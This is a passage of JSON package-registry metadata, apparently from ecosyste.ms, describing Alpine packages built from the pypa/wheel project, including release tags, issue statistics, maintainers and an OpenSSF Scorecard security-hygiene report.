c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.087Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.19","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":59,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2023-12-20T11:13:47.018Z","updated_at":"2023-12-20T11:13:47.018Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.19","url":"https://pkgs.alpinelinux.org/packages?branch=v3.19","ecosystem":"alpine","default":false,"packages_count":23031,"maintainers_count":392,"namespaces_count":2,"keywords_count":3179,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":824},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-12-20T09:51:56.346Z","updated_at":"2026-06-10T05:19:05.125Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/namespaces"}},{"id":6113668,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2022-04-10T20:50:54.000Z","latest_release_published_at":"2022-04-10T20:50:54.000Z","latest_release_number":"0.37.1-r0","last_synced_at":"2026-03-16T18:25:53.806Z","created_at":"2023-01-31T21:24:32.117Z","updated_at":"2026-03-16T18:25:53.806Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.16/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","